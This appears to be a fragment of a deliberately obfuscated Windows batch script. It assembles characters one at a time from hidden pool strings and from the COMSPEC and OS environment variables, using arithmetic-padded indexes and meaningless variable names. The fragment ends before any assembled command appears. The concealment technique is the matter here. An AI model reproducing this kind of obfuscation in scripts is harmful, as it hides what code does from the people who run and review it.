for /f "tokens=2 delims==" %%I in ('set v_i_OlI0O0') do call set "v_l_Ol_l__l_OO=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_l_lOIlIlOl=!v_l_Ol_l__l_OO!"
set /a "v_i_I_0OIl=((((16*6)+3)-35)+(18-18))"
for /f "tokens=2 delims==" %%I in ('set v_i_I_0OIl') do call set "v_l_O__l0IIO_0=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_lOIOIIlO00=!v_l_O__l0IIO_0!"
set /a "v_i_l0O_OO=(44-43)"
for /f "tokens=2 delims==" %%I in ('set v_i_l0O_OO') do call call call set "v_c_O0lO_I00II=%%COMSPEC:~%%I,1%%"
set /a "v_i_l0_OO_=68"
set "v_p_I_l0IOllO_=v_l___I0OI_OOO"
for /f "tokens=2 delims==" %%I in ('set v_i_l0_OO_') do for /f "delims=" %%A in ("!v_p_I_l0IOllO_!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_OI_Ol00O0O=!v_l___I0OI_OOO!"
set /a "v_i_I_lIOI=((((-7*2)+19)*4)+3)"
for /f "tokens=2 delims==" %%I in ('set v_i_I_lIOI') do call set "v_l_l_Ill0lI00=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_O_lI0__O0O=!v_l_l_Ill0lI00!"
set /a "v_i_I0lIl0=(((((0*6)*3)+2)*5)+(22-22))"
for /f "tokens=2 delims==" %%I in ('set v_i_I0lIl0') do call set "v_l_O_Ill0_lIO=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_lOlOO_OI_l=!v_l_O_Ill0_lIO!"
set /a "v_i_lO0I_O=((9*6)+1)"
set "v_p_OII00lOOl_=v_l__OlIlO0I0_"
for /f "tokens=2 delims==" %%I in ('set v_i_lO0I_O') do for /f "delims=" %%A in ("!v_p_OII00lOOl_!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_O_l0IOI0lO=!v_l__OlIlO0I0_!"
set /a "v_i_OlIIO0=((13*3)+1)"
set "v_p_Oll0I_0I0l=v_l_I__0OlO0_O"
for /f "tokens=2 delims==" %%I in ('set v_i_OlIIO0') do for /f "delims=" %%A in ("!v_p_Oll0I_0I0l!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c___I0I0OO0I=!v_l_I__0OlO0_O!"
set /a "v_i_IIOO_0=(((((-11+30)*3)+2)-33)+(30-30))"
for /f "tokens=2 delims==" %%I in ('set v_i_IIOO_0') do call set "v_l_O_O0_O__0l=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c__OOO_00I0O=!v_l_O_O0_O__0l!"
set /a "v_i_O_0O00=(80-39)"
for /f "tokens=2 delims==" %%I in ('set v_i_O_0O00') do call set "v_l__lO_I_lllI=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_l00_0OO_0O=!v_l__lO_I_lllI!"
set /a "v_i__l_0_O=16"
for /f "tokens=2 delims==" %%I in ('set v_i__l_0_O') do call call call set "v_c__II_Ol_l_O=%%COMSPEC:~%%I,1%%"
set /a "v_i_l_0Ol_=(32-20)"
for /f "tokens=2 delims==" %%I in ('set v_i_l_0Ol_') do call set "v_l_lO_OI_II00=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c__O0l0OI00_=!v_l_lO_OI_II00!"
set /a "v_i_I_OOll=((((77-16)-50)*3)+1)"
for /f "tokens=2 delims==" %%I in ('set v_i_I_OOll') do call set "v_l_lOIl____OI=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_lIOO0__I0I=!v_l_lOIl____OI!"
set /a "v_i__I_0Ol=(14+1)"
set "v_p__lOO0OI_Il=v_l_lOI_OlIlI_"
for /f "tokens=2 delims==" %%I in ('set v_i__I_0Ol') do for /f "delims=" %%A in ("!v_p__lOO0OI_Il!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_Ol00lOOIl0=!v_l_lOI_OlIlI_!"
set /a "v_i__lOIlI=(((53-49)+4)+(16-16))"
for /f "tokens=2 delims==" %%I in ('set v_i__lOIlI') do call call call set "v_c_IlIOII0_I_=%%OS:~%%I,1%%"
set /a "v_i_III_ll=((((14+34)*2)+1)-28)"
set "v_p_lI_OI0IlO0=v_l_OII_lO00II"
for /f "tokens=2 delims==" %%I in ('set v_i_III_ll') do for /f "delims=" %%A in ("!v_p_lI_OI0IlO0!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_I_l_0OOIl_=!v_l_OII_lO00II!"
set /a "v_i___III_=57"
set "v_p_lI_OOl0000=v_l_IlO00IO_00"
for /f "tokens=2 delims==" %%I in ('set v_i___III_') do for /f "delims=" %%A in ("!v_p_lI_OOl0000!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c__lI0OIl0I0=!v_l_IlO00IO_00!"
set /a "v_i_Oll_I0=(((4*3)+22)-1)"
set "v_p__OOllO_ll_=v_l_OIOOO0O__I"
for /f "tokens=2 delims==" %%I in ('set v_i_Oll_I0') do for /f "delims=" %%A in ("!v_p__OOllO_ll_!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_IOIO0__0__=!v_l_OIOOO0O__I!"
set /a "v_i_OIOO_I=(30+17)"
set "v_p_O_Ill0_lOI=v_l_lO_l0l_lII"
for /f "tokens=2 delims==" %%I in ('set v_i_OIOO_I') do for /f "delims=" %%A in ("!v_p_O_Ill0_lOI!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c__OOl0OIl0O=!v_l_lO_l0l_lII!"
set /a "v_i_OOIOIl=(-15+47)"
set "v_p__0lllO00_0=v_l_O0000Ol_0O"
for /f "tokens=2 delims==" %%I in ('set v_i_OOIOIl') do for /f "delims=" %%A in ("!v_p__0lllO00_0!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_OO___I0OIl=!v_l_O0000Ol_0O!"
set /a "v_i__0l__0=((52-34)+(23-23))"
set "v_p_lO00O_0000=v_l_IlO_lIO_O0"
for /f "tokens=2 delims==" %%I in ('set v_i__0l__0') do for /f "delims=" %%A in ("!v_p_lO00O_0000!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_O0OOO_OIl_=!v_l_IlO_lIO_O0!"
set /a "v_i_ll_lOI=((((3*3)+1)+40)-36)"
set "v_p_IlI__II0O0=v_l_O_lO_OOOOl"
for /f "tokens=2 delims==" %%I in ('set v_i_ll_lOI') do for /f "delims=" %%A in ("!v_p_IlI__II0O0!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_lIO000lIOI=!v_l_O_lO_OOOOl!"
set /a "v_i_lIlI__=(((95-46)-15)-3)"
set "v_p__l0OIIlI_O=v_l__lIlO0IlI0"
for /f "tokens=2 delims==" %%I in ('set v_i_lIlI__') do for /f "delims=" %%A in ("!v_p__l0OIIlI_O!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c__l0__llO_I=!v_l__lIlO0IlI0!"
set /a "v_i___lOll=(((40+29)-12)+(3-3))"
for /f "tokens=2 delims==" %%I in ('set v_i___lOll') do call set "v_l_IIOl__0l0O=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_l0_I0l_0_0=!v_l_IIOl__0l0O!"
set /a "v_i_lllI_O=(10*4)"
for /f "tokens=2 delims==" %%I in ('set v_i_lllI_O') do call set "v_l_OIl_l0OO_I=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_lOOIO0II00=!v_l_OIl_l0OO_I!"
set /a "v_i_II0l__=((((-6*6)+1)+48)+(9-9))"
set "v_p_l0OI0l0O00=v_l_I0O0I0O0_O"
for /f "tokens=2 delims==" %%I in ('set v_i_II0l__') do for /f "delims=" %%A in ("!v_p_l0OI0l0O00!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_I0l0IIlIlI=!v_l_I0O0I0O0_O!"
set /a "v_i__l_0lO=(((4*5)+4)+(18-18))"
set "v_p_l_0Il_llll=v_l__lIII0OIO_"
for /f "tokens=2 delims==" %%I in ('set v_i__l_0lO') do for /f "delims=" %%A in ("!v_p_l_0Il_llll!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_OIIOlO0OOO=!v_l__lIII0OIO_!"
set /a "v_i_O_0OlO=(23+20)"
for /f "tokens=2 delims==" %%I in ('set v_i_O_0OlO') do call set "v_l_lOI_0IIIO_=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c__lII_llIlO=!v_l_lOI_0IIIO_!"
set /a "v_i__OO_Ol=((((0*6)*2)+1)+(30-30))"
for /f "tokens=2 delims==" %%I in ('set v_i__OO_Ol') do call set "v_l___IOI0_OI0=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_I0II0O_Ill=!v_l___IOI0_OI0!"
set /a "v_i__OOII0=(((11*2)+1)*3)"
for /f "tokens=2 delims==" %%I in ('set v_i__OOII0') do call set "v_l__IOlOO_O_O=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c__OlI0ll0ll=!v_l__IOlOO_O_O!"
set /a "v_i_l_I__O=(((19*4)+2)-30)"
set "v_p_O_l__OlOO_=v_l_llI0Ill0Ol"
for /f "tokens=2 delims==" %%I in ('set v_i_l_I__O') do for /f "delims=" %%A in ("!v_p_O_l__OlOO_!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_I0lIl_000_=!v_l_llI0Ill0Ol!"
set /a "v_i_II0O0O=(15*2)"
set "v_p_lIOII_l_O_=v_l_O_ll__0___"
for /f "tokens=2 delims==" %%I in ('set v_i_II0O0O') do for /f "delims=" %%A in ("!v_p_lIOII_l_O_!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c__0OO_O0lO_=!v_l_O_ll__0___!"
set /a "v_i___OO0l=(((((-15+19)+5)*3)+1)+(1-1))"
set "v_p_Ol_0l_OIlO=v_l___O_0IO0I0"
for /f "tokens=2 delims==" %%I in ('set v_i___OO0l') do for /f "delims=" %%A in ("!v_p_Ol_0l_OIlO!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c__l_O0O0IO_=!v_l___O_0IO0I0!"
set /a "v_i_l0l__O=((((-10-13)+23)*2)+1)"
set "v_p_lI_OI__O__=v_l_O0I_0I0OIO"
for /f "tokens=2 delims==" %%I in ('set v_i_l0l__O') do for /f "delims=" %%A in ("!v_p_lI_OI__O__!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c__O_II0OlOI=!v_l_O0I_0I0OIO!"
set /a "v_i_IIOI__=(((77+21)-37)-23)"
set "v_p_O00I0ll000=v_l_I0_O__I0_0"
for /f "tokens=2 delims==" %%I in ('set v_i_IIOI__') do for /f "delims=" %%A in ("!v_p_O00I0ll000!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_lIlll0I_0O=!v_l_I0_O__I0_0!"
set /a "v_i__0lO0I=((44+10)+(25-25))"
set "v_p_OllO00_OOl=v_l_l____OO_O0"
for /f "tokens=2 delims==" %%I in ('set v_i__0lO0I') do for /f "delims=" %%A in ("!v_p_OllO00_OOl!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c____IOlO_lI=!v_l_l____OO_O0!"
set /a "v_i_Il_ll0=(36-30)"
for /f "tokens=2 delims==" %%I in ('set v_i_Il_ll0') do call call call set "v_c__0_0O_lI_0=%%OS:~%%I,1%%"
set /a "v_i_llO0l0=((34-24)+(26-26))"
set "v_p_O_l000Ol0O=v_l_I__II0Il__"
for /f "tokens=2 delims==" %%I in ('set v_i_llO0l0') do for /f "delims=" %%A in ("!v_p_O_l000Ol0O!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_O0OOIl000_=!v_l_I__II0Il__!"
set /a "v_i__lO_Ol=(2+24)"
set "v_p_OOO0I_OlOl=v_l_O_0l_0ll0l"
for /f "tokens=2 delims==" %%I in ('set v_i__lO_Ol') do for /f "delims=" %%A in ("!v_p_OOO0I_OlOl!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_I_I_O0OO0O=!v_l_O_0l_0ll0l!"
set /a "v_i__O0__I=((1*6)+3)"
for /f "tokens=2 delims==" %%I in ('set v_i__O0__I') do call call call set "v_c_IOO_llO0lI=%%OS:~%%I,1%%"
set /a "v_i_IO0Oll=(65-47)"
for /f "tokens=2 delims==" %%I in ('set v_i_IO0Oll') do call call call set "v_c_lOI___ll__=%%COMSPEC:~%%I,1%%"
set /a "v_i_O0lO0_=((-29+48)*3)"
for /f "tokens=2 delims==" %%I in ('set v_i_O0lO0_') do call set "v_l_OOl_I0l_II=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_Il0OO0lIl_=!v_l_OOl_I0l_II!"
set /a "v_i_O___ll=((((-8+12)*3)+1)*3)"
for /f "tokens=2 delims==" %%I in ('set v_i_O___ll') do call call call set "v_c__IO00IO0l0=%%%%pool___lIl00l:~%%I,1%%%%"
set /a "v_i_I0IlIl=(((51-25)+13)-33)"
for /f "tokens=2 delims==" %%I in ('set v_i_I0IlIl') do call set "v_l_IOO_IOIlII=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_O0000II_II=!v_l_IOO_IOIlII!"
set /a "v_i_I___OI=((55+20)-46)"
set "v_p__lO_IIll0O=v_l_IOI_I__0lO"
for /f "tokens=2 delims==" %%I in ('set v_i_I___OI') do for /f "delims=" %%A in ("!v_p__lO_IIll0O!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_lI_OO0O00I=!v_l_IOI_I__0lO!"
set /a "v_i_I0_0OI=(((-23+47)+13)+(10-10))"
for /f "tokens=2 delims==" %%I in ('set v_i_I0_0OI') do call set "v_l_OlOl0IOlOO=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_O0O_l0I00I=!v_l_OlOl0IOlOO!"
set /a "v_i_lIOIlO=(57+1)"
set "v_p__00OOO0I_l=v_l_lI_OI00_OI"
for /f "tokens=2 delims==" %%I in ('set v_i_lIOIlO') do for /f "delims=" %%A in ("!v_p__00OOO0I_l!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_lI0I00_00_=!v_l_lI_OI00_OI!"
set /a "v_i_O_l0lO=(64-40)"
for /f "tokens=2 delims==" %%I in ('set v_i_O_l0lO') do call set "v_l_IOIO_lIlOI=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_OlOO_O__00=!v_l_IOIO_lIlOI!"
set /a "v_i_l_00_O=(17*4)"
for /f "tokens=2 delims==" %%I in ('set v_i_l_00_O') do call set "v_l_OOOIIO____=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_lO_lO__OOO=!v_l_OOOIIO____!"
set /a "v_i_IO0lI_=(44-9)"
set "v_p__II_l0I_00=v_l_IOO0l00Ol0"
for /f "tokens=2 delims==" %%I in ('set v_i_IO0lI_') do for /f "delims=" %%A in ("!v_p__II_l0I_00!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c___l__Oll0_=!v_l_IOO0l00Ol0!"
set /a "v_i_O_O_0O=((((((2*5)+1)-10)*5)+2)+(12-12))"
for /f "tokens=2 delims==" %%I in ('set v_i_O_O_0O') do call set "v_l_OI000l0O_O=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c___I0_00II0=!v_l_OI000l0O_O!"
set /a "v_i_I_0lOO=((43-2)-32)"
set "v_p_Ol0OOIOl0l=v_l_O_IlOlI_OI"
for /f "tokens=2 delims==" %%I in ('set v_i_I_0lOO') do for /f "delims=" %%A in ("!v_p_Ol0OOIOl0l!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_lI_lO0_IO_=!v_l_O_IlOlI_OI!"
set /a "v_i_lll0ll=(-2+6)"
for /f "tokens=2 delims==" %%I in ('set v_i_lll0ll') do call call call set "v_c__l_0lIlOlI=%%OS:~%%I,1%%"
set /a "v_i_llOOOI=(-16+37)"
set "v_p_Ol_0O_O_Il=v_l_I_lI___0Ol"
for /f "tokens=2 delims==" %%I in ('set v_i_llOOOI') do for /f "delims=" %%A in ("!v_p_Ol_0O_O_Il!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_II_II0OOI0=!v_l_I_lI___0Ol!"
set /a "v_i_OIlO_0=((((8-6)+9)*4)+2)"
for /f "tokens=2 delims==" %%I in ('set v_i_OIlO_0') do call set "v_l_IIOOOlOlOI=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_lI_O_0I_IO=!v_l_IIOOOlOlOI!"
set /a "v_i_I00l00=((101-28)-30)"
set "v_p_O_OlI_ll0I=v_l__IIOIIOl0I"
for /f "tokens=2 delims==" %%I in ('set v_i_I00l00') do for /f "delims=" %%A in ("!v_p_O_OlI_ll0I!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_O_IIIlIOI_=!v_l__IIOIIOl0I!"
set /a "v_i_I0lI0I=((((13*3)+1)+46)-33)"
for /f "tokens=2 delims==" %%I in ('set v_i_I0lI0I') do call set "v_l_OOll_l__I0=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_Il0__lI_0O=!v_l_OOll_l__I0!"
set /a "v_i_O0__Il=((((-15+3)*4)+2)+47)"
for /f "tokens=2 delims==" %%I in ('set v_i_O0__Il') do call call call set "v_c_l_O0I0IIO0=%%OS:~%%I,1%%"
set /a "v_i_I_l0Il=(12+14)"
for /f "tokens=2 delims==" %%I in ('set v_i_I_l0Il') do call set "v_l_IIllO00___=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_IOO__l_0OO=!v_l_IIllO00___!"
set /a "v_i_OI000_=(49-8)"
for /f "tokens=2 delims==" %%I in ('set v_i_OI000_') do call call call set "v_c__IO__0_O_O=%%%%pool___lIl00l:~%%I,1%%%%"
set /a "v_i_ll____=(47-31)"
set "v_p_O_l_IOO_l_=v_l_IO_OOOIllO"
for /f "tokens=2 delims==" %%I in ('set v_i_ll____') do for /f "delims=" %%A in ("!v_p_O_l_IOO_l_!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_lIO_IOIl0I=!v_l_IO_OOOIllO!"
set /a "v_i__llOO_=(((-6+18)+39)+(20-20))"
set "v_p_lO_I_OIll_=v_l_Ill_0_O0_O"
for /f "tokens=2 delims==" %%I in ('set v_i__llOO_') do for /f "delims=" %%A in ("!v_p_lO_I_OIll_!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_OOO0_l_Il0=!v_l_Ill_0_O0_O!"
set /a "v_i__lOIO_=(((20*2)+1)+24)"
set "v_p_I_OllO0Ol0=v_l_O0I_ll00II"
for /f "tokens=2 delims==" %%I in ('set v_i__lOIO_') do for /f "delims=" %%A in ("!v_p_I_OllO0Ol0!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c__II0lOO_lO=!v_l_O0I_ll00II!"
set /a "v_i_l0Ol_l=(((-27+6)+24)*6)"
for /f "tokens=2 delims==" %%I in ('set v_i_l0Ol_l') do call set "v_l_l_IOIOO__O=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c__00_lI0OO0=!v_l_l_IOIOO__O!"
set /a "v_i_O_I0__=((70-17)-13)"
for /f "tokens=2 delims==" %%I in ('set v_i_O_I0__') do call set "v_l__lOII_l000=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_Ol00Oll0I0=!v_l__lOII_l000!"
set /a "v_i_O_00Ol=((4*6)+3)"
for /f "tokens=2 delims==" %%I in ('set v_i_O_00Ol') do call call call set "v_c__lI_O00I0l=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set /a "v_i_llI_OO=((64-46)*3)"
set "v_p_l0O___O0I_=v_l_l_Ol_Ill_I"
for /f "tokens=2 delims==" %%I in ('set v_i_llI_OO') do for /f "delims=" %%A in ("!v_p_l0O___O0I_!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_Il0IlIO00l=!v_l_l_Ol_Ill_I!"
set /a "v_i_I00llO=(((48-43)*6)+2)"
for /f "tokens=2 delims==" %%I in ('set v_i_I00llO') do call set "v_l_l0_lO_00__=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_II0lOIIlO_=!v_l_l0_lO_00__!"
set /a "v_i_Il0000=(((11*6)+4)-35)"
for /f "tokens=2 delims==" %%I in ('set v_i_Il0000') do call call call set "v_c_OI_0OlOI0I=%%%%pool___lIl00l:~%%I,1%%%%"
set /a "v_i__IO0lO=(22+37)"
for /f "tokens=2 delims==" %%I in ('set v_i__IO0lO') do call call call set "v_c_I_0O_l_0Ol=%%%%pool___lIl00l:~%%I,1%%%%"
set /a "v_i_Ol0_Il=((((-37+49)*4)+3)-2)"
set "v_p_I0___IllI_=v_l__0IIll_lOl"
for /f "tokens=2 delims==" %%I in ('set v_i_Ol0_Il') do for /f "delims=" %%A in ("!v_p_I0___IllI_!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_OIl0l_0_OO=!v_l__0IIll_lOl!"
set /a "v_i__OlOI0=((18*3)+7)"
set "v_p_Ill_0llOll=v_l_llIOII0_OI"
for /f "tokens=2 delims==" %%I in ('set v_i__OlOI0') do for /f "delims=" %%A in ("!v_p_Ill_0llOll!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_IlI00IIOl0=!v_l_llIOII0_OI!"
set /a "v_i_IlI0OO=(((7*5)+1)+(29-29))"
for /f "tokens=2 delims==" %%I in ('set v_i_IlI0OO') do call set "v_l_l_lO_OOlII=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_lO0lIIlO__=!v_l_l_lO_OOlII!"
set /a "v_i_II_Ill=((6*3)+(7-7))"
set "v_p_OIll_IOl0l=v_l_IOl_0IlO__"
for /f "tokens=2 delims==" %%I in ('set v_i_II_Ill') do for /f "delims=" %%A in ("!v_p_OIll_IOl0l!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_OIO_0llO_l=!v_l_IOl_0IlO__!"
set /a "v_i_OI0O0_=(((2*6)+1)+(12-12))"
set "v_p_O_l_Il0I__=v_l__0I0_0____"
for /f "tokens=2 delims==" %%I in ('set v_i_OI0O0_') do for /f "delims=" %%A in ("!v_p_O_l_Il0I__!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_OlIIO0Ol0O=!v_l__0I0_0____!"
set /a "v_i__Il_I0=((((((2*6)+3)*3)+1)+2)+(3-3))"
for /f "tokens=2 delims==" %%I in ('set v_i__Il_I0') do call set "v_l_lO_llllIII=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_llI0llIllO=!v_l_lO_llllIII!"
set /a "v_i_lI0OIl=(((3-2)*4)+(23-23))"
set "v_p_lII0lOI0O_=v_l_IlO_0_O_l0"
for /f "tokens=2 delims==" %%I in ('set v_i_lI0OIl') do for /f "delims=" %%A in ("!v_p_lII0lOI0O_!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_Ill0_OI0O0=!v_l_IlO_0_O_l0!"
set /a "v_i__II00l=(((-25-44)+38)+48)"
for /f "tokens=2 delims==" %%I in ('set v_i__II00l') do call set "v_l_lOlIl_0OI0=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_IO0ll00Il_=!v_l_lOlIl_0OI0!"
set /a "v_i_l0_O0l=((0*4)+1)"
set "v_p_II00II__ll=v_l_I0Oll0OlOO"
for /f "tokens=2 delims==" %%I in ('set v_i_l0_O0l') do for /f "delims=" %%A in ("!v_p_II00II__ll!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_ll00__0O0l=!v_l_I0Oll0OlOO!"
set /a "v_i_ll_IO0=((-5-9)+35)"
for /f "tokens=2 delims==" %%I in ('set v_i_ll_IO0') do call set "v_l_l00_O__l_I=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_____0OIIII=!v_l_l00_O__l_I!"
set /a "v_i_IOl0O_=((32*2)+(23-23))"
set "v_p__l0I_00ll0=v_l___Oll00l0_"
for /f "tokens=2 delims==" %%I in ('set v_i_IOl0O_') do for /f "delims=" %%A in ("!v_p__l0I_00ll0!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_O__l0I_OIl=!v_l___Oll00l0_!"
set /a "v_i_lIOllI=((75-27)+(14-14))"
for /f "tokens=2 delims==" %%I in ('set v_i_lIOllI') do call set "v_l_Illll_IIlO=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_lI_0__l0_I=!v_l_Illll_IIlO!"
set /a "v_i___I_0_=(((((0*3)+2)*4)+1)*5)"
set "v_p__OII0lI_lI=v_l__lIO__l0ll"
for /f "tokens=2 delims==" %%I in ('set v_i___I_0_') do for /f "delims=" %%A in ("!v_p__OII0lI_lI!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_l_llOOOII_=!v_l__lIO__l0ll!"
set /a "v_i_I_O0l0=((21*2)+(8-8))"
set "v_p_OOl__l0OIO=v_l_Il_0_Ol_lO"
for /f "tokens=2 delims==" %%I in ('set v_i_I_O0l0') do for /f "delims=" %%A in ("!v_p_OOl__l0OIO!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c__0lOIOIlll=!v_l_Il_0_Ol_lO!"
set /a "v_i__lIl0I=((((((0*6)+5)*3)+1)*4)+3)"
for /f "tokens=2 delims==" %%I in ('set v_i__lIl0I') do call set "v_l_IIl0_l_l0_=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c___IOO__I0l=!v_l_IIl0_l_l0_!"
set /a "v_i_l_I_Il=(-13+32)"
set "v_p_I_II0llOlO=v_l_O_lI0llIIl"
for /f "tokens=2 delims==" %%I in ('set v_i_l_I_Il') do for /f "delims=" %%A in ("!v_p_I_II0llOlO!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_l_OOIlI0lI=!v_l_O_lI0llIIl!"
set /a "v_i_IOlI_O=((-32+33)+(23-23))"
for /f "tokens=2 delims==" %%I in ('set v_i_IOlI_O') do call set "v_l_I_0__lO0O0=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_O__00_I0OI=!v_l_I_0__lO0O0!"
set /a "v_i_I0_0lI=(((41-43)+23)*3)"
for /f "tokens=2 delims==" %%I in ('set v_i_I0_0lI') do call set "v_l_l00I0IllO_=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_Ol0l__Il0I=!v_l_l00I0IllO_!"
set /a "v_i_O_l__O=(((64+29)-42)+(11-11))"
set "v_p_OOO00_0__I=v_l_I0l0lI0I_0"
for /f "tokens=2 delims==" %%I in ('set v_i_O_l__O') do for /f "delims=" %%A in ("!v_p_OOO00_0__I!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_O0lOI0_lll=!v_l_I0l0lI0I_0!"
set /a "v_i_O_l_lO=((((87-29)+35)-36)+(4-4))"
set "v_p_O0_0O00O_O=v_l_I0I0lOllOl"
for /f "tokens=2 delims==" %%I in ('set v_i_O_l_lO') do for /f "delims=" %%A in ("!v_p_O0_0O00O_O!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_I__O_O0_l_=!v_l_I0I0lOllOl!"
set /a "v_i_OI0_lI=(((10*4)+2)+19)"
set "v_p_I0_IlIlIOl=v_l_Il__lOl__I"
for /f "tokens=2 delims==" %%I in ('set v_i_OI0_lI') do for /f "delims=" %%A in ("!v_p_I0_IlIlIOl!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_lOI_IIl_II=!v_l_Il__lOl__I!"
set /a "v_i_lIll_I=((54+10)+(17-17))"
for /f "tokens=2 delims==" %%I in ('set v_i_lIll_I') do call set "v_l_Il_I_0lII_=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c__IO_0_O_IO=!v_l_Il_I_0lII_!"
set /a "v_i_lIIIO_=(32-5)"
for /f "tokens=2 delims==" %%I in ('set v_i_lIIIO_') do call set "v_l_OOOOIOOll0=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_lOIlOl__I_=!v_l_OOOOIOOll0!"
set /a "v_i_O0OIOl=(((3*4)*3)+1)"
for /f "tokens=2 delims==" %%I in ('set v_i_O0OIOl') do call set "v_l_IO_l0_0OOI=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_O0l_l__lOO=!v_l_IO_l0_0OOI!"
set /a "v_i_lO_0_O=(((54-37)+49)+(21-21))"
for /f "tokens=2 delims==" %%I in ('set v_i_lO_0_O') do call set "v_l_lO0I00l00I=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_llO0lOlI_l=!v_l_lO0I00l00I!"
set /a "v_i_Ol0_00=(67-37)"
for /f "tokens=2 delims==" %%I in ('set v_i_Ol0_00') do call set "v_l_OI0l000l_0=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_O_IIII00Il=!v_l_OI0l000l_0!"
set /a "v_i__0I000=(-14+41)"
for /f "tokens=2 delims==" %%I in ('set v_i__0I000') do call set "v_l_llIIl__lll=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_OlIlIlOllI=!v_l_llIIl__lll!"
set /a "v_i__O0IO0=((((-14+16)*5)+1)+(23-23))"
